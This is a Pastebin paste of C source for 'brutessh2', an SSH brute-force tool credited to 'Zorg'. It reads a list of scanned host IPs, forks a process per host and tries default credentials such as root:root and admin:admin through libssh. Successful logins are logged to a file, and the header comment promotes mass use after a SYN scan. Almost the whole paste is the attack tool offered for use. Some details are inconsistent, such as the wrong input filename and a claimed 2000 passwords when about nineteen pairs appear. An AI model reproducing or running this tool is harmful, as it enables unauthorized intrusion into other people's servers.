API tools faq
paste
Guest User

rstforums.com - brutessh2.c

a guest
Nov 28th, 2013
423
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.59 KB | None | 0 0
raw download clone embed print report
  1.  /*
  2. *the first brutessh was only for guest & test logins
  3. *brutessh2 is a brute for sshd port which attempts to login as root with more than 2000 passwords.
  4. *users guest , test , nobody and admin with no passwords are included.
  5. *feel free to add more passwords and more users
  6. *by Zorg
  7. *For mass use a synscan :
  8. *Eg: ./biggssh sship.txt
  9. * Ok.Try This : Hostname root:12345
  10. */
  11.  
  12.  
  13. #include <stdio.h>
  14. #include <unistd.h>
  15. #include <stdlib.h>
  16. #include <string.h>
  17. #include <termios.h>
  18. #include <sys/select.h>
  19. #include <sys/time.h>
  20. #include <signal.h>
  21. #include <errno.h>
  22. #include <libssh/libssh.h>
  23. #include <libssh/sftp.h>
  24. #include <arpa/inet.h>
  25. #include <stdio.h>
  26. #include <netdb.h>
  27. #include <string.h>
  28. #include <fcntl.h>
  29. #include <unistd.h>
  30. #include <time.h>
  31. #include <stdlib.h>
  32. #include <sys/types.h>
  33. #include <sys/socket.h>
  34. #include <sys/wait.h>
  35. #include <netinet/in.h>
  36.  
  37. int flag;
  38. int where;
  39. int shell(SSH_SESSION *session){
  40. struct timeval tv;
  41. int err;
  42. char cmd[]="uname -r -s\n";
  43. char rd[2048];
  44. BUFFER *readbuf=buffer_new();
  45. time_t start,acum;
  46.  
  47.  
  48. CHANNEL *channel;
  49. channel = open_session_channel(session,1000,1000);
  50. if(isatty(0))
  51. err=channel_request_pty(channel);
  52. // printf("channel request pty > %d\n",err);
  53. err= channel_request_shell(channel);
  54. // printf("channel request shell > %d\n",err);
  55. start=time(0);
  56. while (channel->open!=0)
  57. {
  58. usleep(500000);
  59. err=channel_poll(channel,0);
  60. if(err>0)
  61. {
  62. err=channel_read(channel,readbuf,0,0);
  63. }
  64. else
  65. {
  66. if(start+5<time(0))
  67. {
  68. //printf("5 secs passed\n");
  69. return 1;
  70. }
  71. }
  72. }
  73. return 0;
  74. }
  75.  
  76.  
  77.  
  78. void checkauth(char *user,char *password,char *host)
  79. {
  80. char warn[125]="";
  81. SSH_SESSION *session;
  82. SSH_OPTIONS *options;
  83. int argc=1;
  84. char *argv[]={"none"};
  85. FILE *fp;
  86.  
  87. if(where%20==0)
  88. {
  89. fp=fopen("log.bigsshf","a");
  90. fprintf(fp,"tring ssh %s@%s %s\n",user,host,password);
  91. fclose(fp);
  92. }
  93. where++;
  94. alarm(10);
  95. options=ssh_getopt(&argc,argv);
  96. options_set_username(options,user);
  97. options_set_host(options,host);
  98. session=ssh_connect(options);
  99. if(!session) return ;
  100.  
  101. if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
  102. {
  103. ssh_disconnect(session);
  104. return;
  105. }
  106.  
  107. if(shell(session))
  108. {
  109. if(flag) strcpy(warn,"DUP ");
  110. fp=fopen("vuln.txt","a+");
  111. fprintf(fp,"%s%s:%s:%s\n",warn,user,password,host);
  112. printf("%sOk.TRY This : %s:%s:%s\n",warn,user,password,host);
  113. flag=1;
  114. }
  115. else
  116. printf("nologin -> %s:%s:%s\n",user,password,host);
  117. }
  118. int main(int argc, char **argv)
  119. {
  120. FILE *fp;
  121. char *c;
  122. char buff[1024];
  123. int numforks;
  124. int maxf;
  125.  
  126.  
  127. if(argc!=2)
  128. {
  129. printf("./bigssh <sship.txt>\n");
  130. printf("by Zorg\n");
  131. exit(0);
  132. }
  133. unlink("log.bigsshf");
  134. fp=fopen("sship.log","r");
  135. if(fp==NULL) exit(printf("nu pot deschide sship.txt\n"));
  136.  
  137. maxf=atoi(argv[1]);
  138. while(fgets(buff,sizeof(buff),fp))
  139. {
  140. c=strchr(buff,'\n');
  141. if(c!=NULL) *c='\0';
  142. if (!(fork()))
  143. {
  144. //child
  145. where=0;
  146. checkauth("test","test",buff);
  147. checkauth("guest","guest",buff);
  148. checkauth("admin","admins",buff);
  149. checkauth("admin","admin",buff);
  150. checkauth("user","user",buff);
  151. checkauth("root","password",buff);
  152. checkauth("root","root",buff);
  153. checkauth("root","123456",buff);
  154. checkauth("test","123456",buff);
  155. checkauth("test","12345",buff);
  156. checkauth("test","1234",buff);
  157. checkauth("test","123",buff);
  158. checkauth("root","!@#$%",buff);
  159. checkauth("root","!@#$%^",buff);
  160. checkauth("root","!@#$%^&",buff);
  161. checkauth("root","!@#$%^&*",buff);
  162. checkauth("root","*",buff);
  163. checkauth("root","000000",buff);
  164. checkauth("root","00000000",buff);
  165. exit(0);
  166. }
  167. else
  168. {
  169. //parent
  170. numforks++;
  171. if (numforks > maxf)
  172. for (numforks; numforks > maxf; numforks--)
  173. wait(NULL);
  174. }
  175.  
  176. }
  177.  
  178. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!